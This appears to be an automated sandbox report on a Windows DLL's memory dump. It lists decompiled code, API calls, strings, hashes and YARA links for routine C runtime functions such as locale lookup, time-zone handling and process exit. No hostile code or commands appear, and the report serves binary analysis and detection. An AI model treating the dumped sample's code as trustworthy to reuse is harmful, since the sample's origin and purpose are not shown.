0x00000000
0x6de28b41
0x6de28b1e
0x6de28b1e
0x6de28b1f
0x6de28b1f
0x6de28b1f
0x6de28b4c
0x6de28aff
0x6de28aff
0x6de28aff
0x6de28b59
0x6de28b5b
0x6de28b5d
0x6de28b5f
0x6de28b6f
0x6de28b6f
0x6de28b61
0x6de28b61
0x6de28b64
0x00000000
0x6de28b66
0x6de28b66
0x6de28b67
0x6de28b6c
0x6de28b64
0x6de28b75
0x6de28b80
0x6de28b8b
0x6de2897f
0x6de28983
0x6de28988
0x6de2898b
0x00000000
0x6de28991
0x6de28995
0x6de2899a
0x6de2899d
0x00000000
0x6de289a3
0x6de289a9
0x6de289ae
0x6de289b4
0x6de289c4
0x6de289ca
0x6de289d1
0x6de289d7
0x6de289db
0x6de289e1
0x6de289e4
0x6de289eb
0x6de289f2
0x6de289f2
0x6de289f5
0x6de289fc
0x6de28a14
0x6de28a14
0x6de28a17
0x6de289fe
0x6de289fe
0x6de28a05
0x00000000
0x6de28a07
0x6de28a09
0x6de28a0f
0x6de28a0f
0x6de28a05
0x6de28a1f
0x6de28a3b
0x6de28a4b
0x6de28a42
0x6de28a44
0x6de28a44
0x6de28a69
0x6de28a7b
0x6de28a70
0x6de28a73
0x6de28a73
0x6de28a69
0x6de28a85
0x6de28a8f
0x6de28a94
0x6de28a99
0x6de28aa0
0x6de28aa0
0x6de2899d
0x6de2898b

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60
_free.LIBCMT ref: 6DE289A9

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE28B75

Strings

0!m, xrefs: 6DE28AD8
0!m, xrefs: 6DE28964, 6DE2896A

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!m$0!m
API String ID: 1286116820-1395855498
Opcode ID: 83393200c7e2b17309fb69254005481ce6415da97b2b8e57cb5ec7cd730e1b94
Instruction ID: e68977eb1193c54e642464f88e366187d46331ea82504d62cf11590a73edc188
Opcode Fuzzy Hash: 83393200c7e2b17309fb69254005481ce6415da97b2b8e57cb5ec7cd730e1b94
Instruction Fuzzy Hash: F851C9B2D05619EFDB10DF698CC09BEB7B8EB41318B31466ED554A7240EF709A458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DE2E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6de2e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6de42f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6de42f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6DE1BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6de2e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

0x6de2e51d
0x6de2e51e
0x6de2e525
0x6de2e5c9
0x6de2e5cf
0x6de2e5e2
0x6de2e5e8
0x6de2e5ed
0x6de2e5ef
0x6de2e5ef
0x6de2e5f5
0x6de2e5fa
0x6de2e5fa
0x6de2e5e4
0x6de2e5e4
0x00000000
0x6de2e5e4
0x6de2e52b
0x6de2e530
0x00000000
0x00000000
0x6de2e536
0x6de2e53b
0x6de2e53d
0x6de2e53d
0x6de2e543
0x00000000
0x00000000
0x6de2e548
0x6de2e55f
0x6de2e55f
0x6de2e568
0x6de2e56a
0x00000000
0x00000000
0x6de2e56c
0x6de2e571
0x6de2e573
0x6de2e573
0x6de2e579
0x00000000
0x00000000
0x6de2e57e
0x6de2e59c
0x6de2e59e
0x6de2e5c1
0x00000000
0x6de2e5c6
0x6de2e5a6
0x6de2e5b9
0x00000000
0x00000000
0x6de2e5bb
0x00000000
0x6de2e5bb
0x6de2e580
0x6de2e588
0x00000000
0x00000000
0x6de2e58a
0x6de2e58d
0x6de2e593
0x00000000
0x00000000
0x00000000
0x6de2e595
0x6de2e597
0x6de2e599
0x00000000
0x6de2e599
0x6de2e54a
0x6de2e552
0x00000000
0x00000000
0x6de2e554
0x6de2e557
0x6de2e55d
0x00000000
0x00000000
0x00000000
0x6de2e55d
0x6de2e563
0x6de2e565
0x00000000

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6DE2E837,?,00000000), ref: 6DE2E5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6DE2E837,?,00000000), ref: 6DE2E5DA
GetACP.KERNEL32(?,?,6DE2E837,?,00000000), ref: 6DE2E5EF

Strings

7m, xrefs: 6DE2E5CF, 6DE2E5A6
ACP, xrefs: 6DE2E536
OCP, xrefs: 6DE2E56C

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: 7m$ACP$OCP
API String ID: 2299586839-3422903688
Opcode ID: 6bbc702f3003c0e1d601cf64c8805449166e677c000b6fd8fab3ed68d1e9a59d
Instruction ID: f0b70e353e2ab9763577518776d02c514cf4d3ba61bd457234b3c8c4f7c0a98b
Opcode Fuzzy Hash: 6bbc702f3003c0e1d601cf64c8805449166e677c000b6fd8fab3ed68d1e9a59d
Instruction Fuzzy Hash: 2221B5226E492696D7248F74C901BA777B6BF45F18B728424E905E7300FF32DD41C750

Uniqueness

Uniqueness Score: -1.00%

Function 6DE302BC, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6DE30402

Strings

1#QNAN, xrefs: 6DE31608
1#IND, xrefs: 6DE315FA
1#INF, xrefs: 6DE3160F
1#SNAN, xrefs: 6DE31601

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 6ad521238a5a7c602c5abeec75b8365c0f804ebd456e7160ef5236910a1da0ad
Instruction ID: 1f2cfb2d45f3074bc588900ff15b925052e1478e806c6b84f5c5d368daa772f4
Opcode Fuzzy Hash: 6ad521238a5a7c602c5abeec75b8365c0f804ebd456e7160ef5236910a1da0ad
Instruction Fuzzy Hash: 6BC24B71E086298FDB25CE69DD407EAB3B5EB45309F2641EAD44DE7240EB74AE81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E19F, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D65E
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DE2E1F3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DE2E244
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DE2E304

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorInfoLastLocale$_free$_abort
String ID:
API String ID: 2829624132-0
Opcode ID: 3b34bf721397fa7606c1f084cb3fa4f59349991b0a5ae4ac2c08cc72bfa9de26
Instruction ID: 9701172e6a2a8cd083f5f5fb0b74f81eccae1e7bbb63762736777ab13c8fdc8e
Opcode Fuzzy Hash: 3b34bf721397fa7606c1f084cb3fa4f59349991b0a5ae4ac2c08cc72bfa9de26
Instruction Fuzzy Hash: 6261BF72544A279BEB198F34CC81BBA77B8FF04B19F204079D916D6680EF74DA91CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DE11F6D, Relevance: 4.6, APIs: 3, Instructions: 78COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,6DDD75D9), ref: 6DE12065
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,6DDD75D9), ref: 6DE1206F
UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,6DDD75D9), ref: 6DE1207C

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: f3705bf603334e8807697f038b1036df77b471df5096da040d8d73a0482957e7
Instruction ID: 66901f4bc8df62da78602a0f9a418c86f591c1aa2eefd99f18fc058d714b2561
Opcode Fuzzy Hash: f3705bf603334e8807697f038b1036df77b471df5096da040d8d73a0482957e7
Instruction Fuzzy Hash: 6D31D4B494122D9BCF21DF64DC88B9DBBB8BF08310F5142DAE41CA7250EB709B818F54

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1966F, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,6DE19645,?,6DE92D28,0000000C,6DE1978A,?), ref: 6DE19690
TerminateProcess.KERNEL32(00000000,?,6DE19645,?,6DE92D28,0000000C,6DE1978A,?), ref: 6DE19697
ExitProcess.KERNEL32 ref: 6DE196A9

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: a7c431519d56edad444bed71f4a74ede8ef3b11edd755321bf9ab683cfcf7b39
Instruction ID: c573b2dc8e43032ac2188c71c0ee6abb84f00ad321b07b02c8181cf578a382f6
Opcode Fuzzy Hash: a7c431519d56edad444bed71f4a74ede8ef3b11edd755321bf9ab683cfcf7b39
Instruction Fuzzy Hash: FAE0B675148608AFCF116F54CD08E693BB9EF56289F524428F91A9B122CF35D982DA90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E077, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

EnumSystemLocalesW.KERNEL32(6DE2E19F,00000001,00000000,?,;m,?,6DE2E7CC,00000000,?,?,?), ref: 6DE2E0E9

Strings

;m, xrefs: 6DE2E07C

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ;m
API String ID: 1084509184-1775242986
Opcode ID: de551f1ea615c4192dbf429fed53ddd78c5a824d868fb2f4dbb25349bccc0518
Instruction ID: 72a229aa44e3ade8ec3019faaac8aff5d774d122e95006b516c0b69949b67915
Opcode Fuzzy Hash: de551f1ea615c4192dbf429fed53ddd78c5a824d868fb2f4dbb25349bccc0518
Instruction Fuzzy Hash: CF11E93B2047059FDB189F39C891ABABBA2FF8475CB25443CD94697B40D771A943C740

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2DF65, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D65E
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,Bm,00000000,?), ref: 6DE2DFB9

Strings

)mU, xrefs: 6DE2DDD4
Bm, xrefs: 6DE2DE8F, 6DE2DED7, 6DE2DF7F
t!mE, xrefs: 6DE2DE09

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID: )mU$Bm$t!mE
API String ID: 1663032902-4093402219
Opcode ID: deca03d890fcbc7e15ca154c8a832f74885dffc4ef6c05767f3f1f70439164f5
Instruction ID: 40eec4fd93aa51121e48c9ba8bc3833925447fe4f46a580ae0161e212c9377e4
Opcode Fuzzy Hash: deca03d890fcbc7e15ca154c8a832f74885dffc4ef6c05767f3f1f70439164f5
Instruction Fuzzy Hash: E8F04433A44109ABDB14AE78CC44EBA33A8DF85314F11017EEA02DB280EF34AD0483A0

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E112, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

EnumSystemLocalesW.KERNEL32(6DE2E3EF,00000001,00000006,?,;m,?,6DE2E790,;m,?,?,?,?,?,6DE1E03B,?,?), ref: 6DE2E15E

Strings

;m, xrefs: 6DE2E117

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID: ;m
API String ID: 1084509184-1775242986
Opcode ID: 655d2daf5eb07af0f58e52ba7c222e724eb56f7b6a614249997f4773b6d7c9fd
Instruction ID: ed0b69c80f75f8b42f68b4c4879f6d695fb4bb6ef84fd5f778f07a6d5b26e208
Opcode Fuzzy Hash: 655d2daf5eb07af0f58e52ba7c222e724eb56f7b6a614249997f4773b6d7c9fd
Instruction Fuzzy Hash: 41F0C2362087155FD7155E398C81A7A7BA5EF81B6CF25443CFA05DB640DBB1E9418640

Uniqueness

Uniqueness Score: -1.00%

Function 6DE24323, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,6DE1DA1E,?,00000004), ref: 6DE24376

Strings

GetLocaleInfoEx, xrefs: 6DE24334, 6DE2433E

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: 598cfe550d829c53dc146fcc58e96d2bfd49bb62758563d50c0e326976c24757
Instruction ID: 7699476759dcd7aa0e2a7248afcb84f104800e099526b67c5941f65551f5fe43
Opcode Fuzzy Hash: 598cfe550d829c53dc146fcc58e96d2bfd49bb62758563d50c0e326976c24757
Instruction Fuzzy Hash: 05F0F07198510CBBCF126FA0DC04F7E3FA0EF18302F22801AF9042A250CF328A209AA5

Uniqueness

Uniqueness Score: -1.00%

Function 6DE05150, Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction ID: d815b99a42980fd134ffc4612a3693ed23c8ca5d2c1b33ea8ee71aff7c6289fd
Opcode Fuzzy Hash: 279d36cb624a28dc2fc8018b7e3dec838c29ea01aa9c7dd68c94839918219c16
Instruction Fuzzy Hash: 9B022C71E0421A9FDB14CFA9C8906AEB7F5FF88314F25816AD919F7344DB30A951CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DE20396, Relevance: 1.8, APIs: 1, Instructions: 269COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6DE20391,?,?,00000008,?,?,6DE33E64,00000000), ref: 6DE205C3

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: e7b96bbe85082331924b941340018a6a1d0e060806bf8a05f69057307e88aa0e
Instruction ID: 23072aa2422805e4d95fffde1a03de69904452ef21e34548623e493be1cf0850
Opcode Fuzzy Hash: e7b96bbe85082331924b941340018a6a1d0e060806bf8a05f69057307e88aa0e
Instruction Fuzzy Hash: 29B15A312206099FD715CF29C4A6B657BE0FF45368F258658E8E9DF2E1CB35E982CB40

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E3EF, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D65E
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D66B

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6DE2E443

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: b8c84e62ddfacfd3dfe93cfd34f7817a54d60864b73c5a6903e70e5fbd461ad1
Instruction ID: fc13ea7f9a735767702a07aa3180d7d184e6955d6e15a111ea73fb6dd6280a73
Opcode Fuzzy Hash: b8c84e62ddfacfd3dfe93cfd34f7817a54d60864b73c5a6903e70e5fbd461ad1
Instruction Fuzzy Hash: 6B21B3725185279BEB149F34CC41FBA73B8EF41728F20417AED05EA244EF75A944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6DE2E61F, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1D5FF: GetLastError.KERNEL32(?,6DEACE94,6DE11803,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D603
Part of subcall function 6DE1D5FF: _free.LIBCMT ref: 6DE1D636
Part of subcall function 6DE1D5FF: SetLastError.KERNEL32(00000000,6DE92B60,0000000C,6DDD402A,00000000,00000001,?,`km,00000020,6DDD159B,235275DE), ref: 6DE1D677
Part of subcall function 6DE1D5FF: _abort.LIBCMT ref: 6DE1D67D

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,6DE2E49A,00000000,00000000,?), ref: 6DE2E64B

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: e64a50a3e118709bbd2b4ed081a0e8f6ffab8031618818d84a770bf0c62c3d82
Instruction ID: 4e78cfb1f3cafd74eab17e67d4b50492d79a88ae0a59cd17bdf72fe47f30b505
